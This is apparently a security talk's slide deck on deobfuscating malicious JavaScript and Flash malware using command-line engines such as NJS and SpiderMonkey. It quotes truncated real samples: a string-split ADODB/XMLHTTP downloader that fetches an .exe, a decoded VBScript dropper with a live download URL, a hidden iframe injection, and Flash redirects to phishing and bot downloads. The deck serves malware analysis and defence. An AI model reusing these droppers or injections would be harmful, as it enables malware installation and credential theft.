Reverse Engineering Malicious Javascript
- 2. Problem, Solution, You
Bad guys want to get malware on your box.
They don’t want your security systems to detect their
known exploits.
So they obfuscate them.
By the end of this talk you’ll be armed with techniques to
defeat their techniques.
arbornetworks.com Page 2 Company Confidential
- 3. JavaScript Introduction
• Created by Netscape, in almost all browsers
now
• In-browser scripting
• Mix of procedural and OOP
• Supports events, regular expressions
• Everything is a reference, even functions
arbornetworks.com Page 3 Company Confidential
- 4. Confusion: Mixed Programming Styles
• quot;newquot; keyword to create an object
• Nest functions mean classes and methods
• Make a function
function add(x, y) {
return x + y;
}
arbornetworks.com Page 4 Company Confidential
- 5. OOP JavaScript
• Make a class with methods
function MyNumber() {
function add(x, y) {
return x + y;
}
}
n = new MyNumber()
print(n.add(1, 2));
arbornetworks.com Page 5 Company Confidential
- 6. Getting JavaScript to the Browser
• Embed in page
<script language=quot;JavaScript”>
document.write(quot;Hello, world!quot;);
</script>
• Specify a file to include
<script
src=quot;path/to/file”></script>
arbornetworks.com Page 6 Company Confidential
- 7. References
• JavaScript Guide
– http://wp.netscape.com/eng/mozilla/3.0/handbook/javas
cript/
• JavaScript Language Resources
– http://developer.mozilla.org/en/docs/JavaScript_L
anguage_Resources
• JavaScript: The Definitive Guide, Fifth
Edition
– http://www.oreilly.com/catalog/jscript5/
arbornetworks.com Page 7 Company Confidential
- 8. Object Hierarchy
• Browser
– Window
• History
• Location
• Document
arbornetworks.com Page 8 Company Confidential
- 9. JavaScript: The Definitive Guide
By David Flannagan; ISBN: 1-56592-235-2,
637 pages.
Second Edition, January 1997
arbornetworks.com Page 9 Company Confidential
- 10. Important Objects
• Document
– The current HTML
– Methods
• write()
• writeln()
• Location
– Where you currently are (URL)
– Methods
• reload()
• replace()
arbornetworks.com Page 10 Company Confidential
- 11. Global Functions We Care About
•print() -- print the arguments to stdout
•eval() -- treat the arguments as code to
execute
•encode() -- convert to ASCII %xx
expressions
•decode() -- convert from ASCII %xx
expressions
•alert() -- displays a modal browser dialog
•+ operator -- concatenate strings (like Java)
arbornetworks.com Page 11 Company Confidential
- 12. Events We Care About
•onLoad() -- execute a code block when the
window loads
•onUnload() -- execute a code block when
the window closes or changes
•onSubmit() -- executes a code block when a
form is submitted
arbornetworks.com Page 12 Company Confidential
- 13. What is Malicious JavaScript?
• Delivers browser exploits
– ADODB.Stream(), setSlice(), etc
• Often drops ActiveX/VBScript content
• Used to download malware onto the system
• Obfuscation to avoid simple signatures
arbornetworks.com Page 13 Company Confidential
- 14. What is Obfuscated JavaScript?
• Simple: JavaScript with opaque code to thwart static review
• Hides author’s methods and intents
• Varying degrees of obfuscation
• FromCode() - Simple ASCII chr(), ord()
• Base64 encoding
– iWebTool HTML Encrypt
• http://www.iwebtool.com/html_encrypter
• String splits
• Customer encoder
– Advanced HTML Protector
• http://www.creabit.com/htmlprotect/
arbornetworks.com Page 14 Company Confidential
- 16. Simple Decode with NJS
• Strip <script> and HTML tags
• Change document.write() to print()
$ js iweb.js
<html>
<head>
<title>Hello</title>
</head>
<body>
<h1>Hello there.</h1>
</body>
</html>
arbornetworks.com Page 16 Company Confidential
- 17. Simple String Join Example
function ravlhhwx(zxnkfzz) {
gqibom = quot;Gquot;+quot;Equot;+quot;Tquot;;
var mjb = quot;http://www.newoldway.info/c/1900/counter21.php?a=3&c=3quot;;
runbj = quot;Xquot;+quot;Mquot;+quot;LHquot;+quot;TTPquot;;
var gzfzi = zxnkfzz.CreateObject(quot;Scriptiquot;+quot;nquot;+quot;gquot;+quot;.quot;+quot;FileSystquot;+quot;emObjectquot;, quot;quot;)
juezny = quot;Shequot;+quot;llquot;;
ifhhye = quot;Aquot;+quot;DOquot;+quot;DBquot;
vkdvhle = quot;kppoquot;+quot;.exequot;;
wrrb = quot;.quot;;
jyknv = quot;GETquot;;
daxhi = quot;Aquot;+quot;pplicaquot;+quot;tionquot;;
vvu = quot;.quot;;
rramwz = quot;Squot;+quot;tquot;+quot;rquot;+quot;equot;+quot;amquot;;
ybxbb = quot;MSquot;+quot;Xquot;+quot;MLquot;+quot;2quot;;
…
Simple string splits and joins, builds an AJAX object
arbornetworks.com Page 17 Company Confidential
- 18. More Complicated Example
dF('%2A8HXhwnuy%2A75Qfslzflj%2A8I%2A7%3COf
%7BfXhwnuy%2A7%3C%2A8Jithzrjsy3%7Cwnyj%2A7
%3D%2A7%3C%2A8H%2A7Kyj%7Dyfwjf%2A8J%2A%3AH
%2A7%3C%2A77%2A8J%2A7%3C%2A7%3E%2A8Gnk%2A7
%3Dithzrjsy3ZWQ3xzgxywnsl%2A7%3D5%2A7H9%2A
7%3E%2A8I%2A8I%2A7%3Cmyyu%2A7%3C%2A7%…
What the heck is dF()?
A custom decoder.
What is this code doing?
Let’s find out.
arbornetworks.com Page 18 Company Confidential
- 19. Two Options …
• Manually XOR, mask, array lookup, etc …
Or brute force
• I chose brute force, I’m lazy
• How? Get the JavaScript to the point where
the browser could actually use it
arbornetworks.com Page 19 Company Confidential
- 20. Bad Idea: Using the Browser
• Several people like to do this
• Wrap questionable JavaScript in <textarea> tags
– document.write() will wind up there
– eval() will still work
• Replace document.write() with alert()
– Suggestions from
http://handlers.sans.org/dwesemann/decode/index.html
• Good luck getting full info from a browser under
0day conditions
– Increasing amount of browser-based debugging attacks and
defenses
arbornetworks.com Page 20 Company Confidential
- 21. Better Idea: Divorce the JS Engine from
the Browser
NJS
SpiderMonkey
Rhino (Jscript in Java)
arbornetworks.com Page 21 Company Confidential
- 22. Decoding Malicious JS On The CLI
• Cut and paste JavaScript code body or
bodies into a file
• Strip any extraneous HTML tags
– These JS tools don’t understand HTML
• Save file
• Evaluate with NJS js(1)
arbornetworks.com Page 22 Company Confidential
- 23. NJS JavaScript Toolkit
• NJS is an independent implementation of the
JavaScript language developed by Netscape
and standardized by ECMA. It is designed to
be re-entrant, extendible, fast, and
programmable.
• http://www.njs-javascript.org/
• Builds on OS X, UNIX, etc …
arbornetworks.com Page 23 Company Confidential
- 24. Cleaning Up The Mess
• Change eval() to print()
• Change document.write() to print
– Alternatively create a document object with a write()
method (equivilent to print())
• Prepend all of the needed bits
arbornetworks.com Page 24 Company Confidential
- 25. Iterative Example
Cut and paste malicious JS body
$ cat mal.js
var h=quot;+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<-
p hy4xBA9W?T6/18…
Now try and execute
$ js mal.js
VM: warning: using undefined global `document'
js: evaluation of file `mal.js' failed:
StringStream:0: illegal object for call_method
arbornetworks.com Page 25 Company Confidential
- 26. Iterative Example (cont)
$ js mal.js
function i(y){var
f='',z,q,w,v;for(z=0;z<y.length;z++){q=y.
charAt(z);w=h.indexOf(q);if(w>-
1){v=((w+1)%x-
1);if(v<=0){v+=x}f+=h.charAt(v-
1)}else{f+=q}}c+=f};function
jjj(){document.write(c);g=quot;quot;}
VM: warning: using undefined global `i'
js: evaluation of file `mal.js' failed:
mal.js:8: illegal function object in jsr
arbornetworks.com Page 26 Company Confidential
- 27. Iterative Example (cont)
• Code in red is a decryptor we need in the
page
• Cut and paste this function i() into the head
of mal.js
• Rerun through js(1)
arbornetworks.com Page 27 Company Confidential
- 28. Iterative Example (concl)
$ js mal.js
function i(y){var
f='',z,q,w,v;for(z=0;z<y.length;z++){q=y.charAt(z);w=h.ind
exOf(q);if(w>-1){v=((w+1)%x-
1);if(v<=0){v+=x}f+=h.charAt(v-
1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;}
<script language=quot;JavaScriptquot; type=quot;text/javascriptquot;>
var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[ (document.compatMode=='CSS1Compat') ?
'documentElement' : 'body' ];
vuln_x= window.screenLeft+68;
vuln_y= window.screenTop-19;
//vuln_w= 420;
vuln_w= root.offsetWidth-220;
vuln_h= 17;
vuln_show();
}…
arbornetworks.com Page 28 Company Confidential
- 29. Double Decodes
• Clean up HTML
• Decode on the CLI
• Result: More encoding!
• Repeat until it’s not encoded any longer
arbornetworks.com Page 29 Company Confidential
- 30. Example (Week of March 21, 2007)
$ curl http://58.65.239.106/cosmos/gcs_1/ | tee mal.js
<script language=JavaScript>function makemelaugh(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,23,22,45,3
2,14,57,50,40,62,0,0,0,0,0,0,49,25,24,18,43,16,5,8,30,15,
54,35,17,11,33,56,47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36
,0,46,52,37,44,42,21,6,39,19,20,29,34,1,13,27,59,10,61,2,
12,31,60,9,38,53,28);for(j=Math.ceil(l/b);j>0;j--
){r='';for(i=Math.min(l,b);i>0;i--,l--
){w|=(t[x.charCodeAt(p++)-
48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s-
=2}else{s=6}}document.write(r)}}makemelaugh(quot;qsq84VRO9ua6
qqr@gizJE59pjsecG1dQiiw84sec6h59KDP0qVv7ZYvYMYvQ1lG08hu7B
IdJHKGc4e8lqsU6FpvYg0zrUPdYsuwlsp3YVTANF9R_Z76hZlAxiCOxV7
ANw1zJS1zJFJz7A10xFJvQHi8JsDkctId@Iu6QC0tl4selqeOOt…
arbornetworks.com Page 30 Company Confidential
- 31. Prepare The Decode
function MyDoc () {
function write(x) {
print(x);
}
}
document = new MyDoc();
// delete HTML tags
function makemelaugh(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(
63,23,22,45,32,14,57,50,40,62,0,0,0,0,0,0,49
,25,24,18,43,16,5,8,30,15,54,35,17,11,33,56,
47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36,0…
arbornetworks.com Page 31 Company Confidential
- 32. Execute the Decode
$ js mal.js
<HTML xmlns:IE>
<body>
<SCRIPT language=quot;VBScriptquot;>
Module_Path=quot;http://58.65.239.106/cosmos/gcs_1/get.php?file=exequot;
If navigator.appName=quot;Microsoft Internet Explorerquot; Then
If InStr(navigator.platform,quot;Win32quot;) <> 0 Then
Const ssfFONTS=20
Const adModeReadWrite=3
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
…
arbornetworks.com Page 32 Company Confidential
- 33. Refetch, Smaller JScript
<script language=JavaScript>function
makemelaugh(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,15,24
,60,26,0,2,52,5,42,0,0,0,0,0,0,23,28,58,51,25,39,12,
10,33,17,53,14,29,37,1,46,6,43,4,18,9,62,59,54,30,20
,47,0,0,0,0,8,0,22,34,7,36,3,41,38,49,27,55,31,32,57
,21,56,45,40,19,61,13,50,48,35,16,11,44);for(j=Math.
ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--
,l--){w|=(t[x.charCodeAt(p++)-
48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=
8;s-
=2}else{s=6}}document.write(r)}}makemelaugh(quot;G4Du1rz
j1wtMm@FW21sbGKkhkQooBQovDQ_uP@AuN0zCR4DHT0FhX0FWY6quot;
)</script>
arbornetworks.com Page 33 Company Confidential
- 34. Execute … Enjoy!
$ js mal1.js
<center>Sorry! You IP is blocked.</center>
arbornetworks.com Page 34 Company Confidential
- 35. Life Isn’t Always This Easy
• Lots of defensive JavaScript coming around
• Kills all sorts of inspection routines
• Don’t run this in the browser!
arbornetworks.com Page 35 Company Confidential
- 36. Sneaky Example
$ wget --user-agent=' ' -m
http://www.99express.com/indexxx.html
<HTML><SCRIPT LANGUAGE=quot;JavaScriptquot;>
<!--
function K508A7(B2B5E7){var
H74E49=arguments.callee.toString().replace(/W/g,quot;quot;).to
UpperCase();var Q10CCF;var UAC893=H74E49.length;var
D9C672;var AEEA53;var R72B7F=quot;quot;;var E9B774=new
Array(0,1996959894,3993919788,2567524794,124634137,1886
057615,3915621685,2657392035,249268274,2044508324,37721
15230,2547177864,162941995,2125561021,3887607047,242844
4049,498536548,1789927666,4089016648,2227061214,4505488
61,1843258603,4107580753,2211677639,325883990,168477715
2,4251122042,2321926636,335633487,16613…
So far this just looks like a more convoluted encoder
arbornetworks.com Page 36 Company Confidential
- 37. Decoding Sneaky …
Clean up Jscript, remove HTML
Execute in js(1)
$ js -g indexxx.js
js: evaluation of file `indexxx.js' failed:
indexxx.js:1: illegal object for call_method
What’s wrong?
var H74E49= arguments.callee.toString().
replace(/W/g,quot;quot;).toUpperCase();
NJS js(1) doesn’t know about ‘arguments’
arbornetworks.com Page 37 Company Confidential
- 38. arguments.callee …
• Self reference …
callee is a property of the arguments local variable
available within all function objects; callee as a
property of Function.arguments is no longer used.
(Function.arguments itself is also deprecated.)
arguments.callee allows anonymous functions to refer
to themselves, which is necessary for recursive
anonymous functions.
• Source: Core JavaScript 1.5 Reference:
Functions:arguments:callee, Mozilla website
• Often used as a tamper-proof method
arbornetworks.com Page 38 Company Confidential
- 39. Enter SpiderMonkey
• SpiderMonkey is the code-name for the
Mozilla's C implementation of JavaScript.
• http://www.mozilla.org/js/spidermonkey/
• Builds on UNIX, OS X, etc
arbornetworks.com Page 39 Company Confidential
- 40. Making Sneaky Work
Prepend a working document object (my basic document
object doesn’t work with SpiderMonkey)
function my_document () {
// a property (initialized to string)
this.m_property=quot;quot;;
this.write=function(string)
{
print(quot;my_document::writequot;);
print(string);
}
};
// declare a globally-accessible document object
var document=new my_document();
From http://www.websense.com/securitylabs/blog/blog.php?BlogID=98
arbornetworks.com Page 40 Company Confidential
- 41. Run it Through SpiderMonkey
$ cat jose.html | ./js
my_document::write
</textarea><iframe src=quot;http://ibm-
ssl.com:81/cgi-bin/nsp.cgi?p=buyquot; width=1
height=1 style=quot;border: 0pxquot;></iframe>
• Notice the close textarea tag
• Code also will barf on alert()
• Notice that the decode array expected the full decode
function
• Cannot mess with it via print() or alert()!
arbornetworks.com Page 41 Company Confidential
- 42. Sometimes We Need Other Tools
• Sometimes NJS js(1) will barf on some
character codes
• What do we do? We call out to another
language
• I like Python so …
• s = <array of numbers as a Python tuple>
• … for i in s: r += chr(s) …
arbornetworks.com Page 42 Company Confidential
- 43. Malicious JScript in the Large
• NeoSploit
• Similar to Web Attacker framework
• Lots of exploits
• Enumerates vulnerable components
– Web browser
– Accessible CLSIDs
– At least 7 different exploits
• Fingerprints you quickly
• Launches the right exploit
arbornetworks.com Page 43 Company Confidential
- 44. Where We See This Stuff Day to Day
• Feebs worm
– Convoluted JavaScript body drops a VBScript
malware reassembler
• ADODB.Stream() exploits
– Usually grab a first stage EXE
• Other ActiveX exploits
– Often mutliple CLSIDs stacked in one malicious
web page
arbornetworks.com Page 44 Company Confidential
- 45. Tools and Tips
• curl(1) and wget(1) are your friend
– Learn how to set your own Referrer and User-Agent
fields
• Don’t use a vulnerable browser when you’re
doing this work
• tee(1) or script(1) most of your cmdline work
• My favorite platforms: UNIX, OS X
arbornetworks.com Page 45 Company Confidential
- 46. Unsolved Problems
• No complement to js(1) for VBScript …
anyone?
– Suggestion: WINE with cscript.exe
• RELIABLE generic detection
– IDS, IPS sigs
– Browser plugins
• Non-browser based honeyclients don’t
understand JS
– Bolt in SpiderMonkey C bindings?
arbornetworks.com Page 46 Company Confidential
- 47. Bonus Material: Flash Malware
• Flash can contain JavaScript actions within
• These JavaScript actions can affect the
browser
• Tool of choice: Flasm
– Flasm is a free command line
assembler/disassembler of Flash ActionScript
bytecode.
– http://flasm.sourceforge.net/
arbornetworks.com Page 47 Company Confidential
- 48. Phlash Redirection
Real Example from December 10, 2006
http://i127.photobucket.com/albums/p126/click2es/prize.swf
$ flasm -d
/home/jose/malware/10dec06/i127.photobucket.com/albums/p126/c
lick2es/prize.swf
Flasm configuration file flasm.ini not found, using default
values
movie '/home/jose/ … /prize.swf' compressed // flash 6, total
frames: 1, frame rate: 12 fps, 50x40 px
frame 0
getURL 'http://www.fair-
faxy.com/Signin.eBay.com.ws.eBayISAPI.dslSignInco.partnerId.p
UserId.siteid.pageType.pa1.i1.BshowGif.UsingSSL.https.ebay.co
m.pa2.errmsg.runame.ruparams.ruproduct.sid.confirm5.htm'
'_self'
end // of frame 0
end
arbornetworks.com Page 48 Company Confidential
- 49. Flash Exploit Downloader
22:45:30 < dfx> http://hiltonfreak.tripod.com/parishilton.swf
frame 156
Downloads IRC Bot
getURL 'javaplugin.zip' '_top'
end // of frame 156
Archive: hiltonfreak.tripod.com/javaplugin.zip
Length Date Time Name
-------- ---- ---- ----
13624 04-13-07 22:13 readme.txt
60960 04-13-07 21:44 javaplugin.exe
-------- -------
arbornetworks.com Page 49 Company Confidential
- 50. Phishing in Flash
• Call out to web components to build what
appears to be a legit site
• All run within a Flash object
• Intercept data, process and steal
• Huge decodes, but Flasm shows how it’s
done
arbornetworks.com Page 50 Company Confidential
- 51. Phlash Phishing
19 March 2007: http://200.29.161.100/1/capital2.swf
…
defineButton 164
on overDownToOverUp
getURL 'http://www.capitalone.com/' '_blank'
end
end // of defineButton 164
defineButton 165
on overDownToOverUp
getURL
'http://www.capitalone.com/legal/privacy.php' '_blank'
end
end // of defineButton 165
…
arbornetworks.com Page 51 Company Confidential
- 52. Back to JavaScript
• The bad guys are using JavaScript as their
delivery vehicle
• JavaScript: Learn it, love it
• They’re limited by the fact that the
JavaScript has to be decoded to be used by
the browser
• Their obfuscation tools are primitive but
effective
– But they require a human to analyze
• They’ll continue to push the envelope
– Malware2.0?
arbornetworks.com Page 52 Company Confidential
- 53. Thank You
Acknowledgements
• A (wishes to remain anonymous)
• Websense guys
• Ken Dunham @ iDef
• Joe Stewart @ SecureWorx
• You
arbornetworks.com Page 53 Company Confidential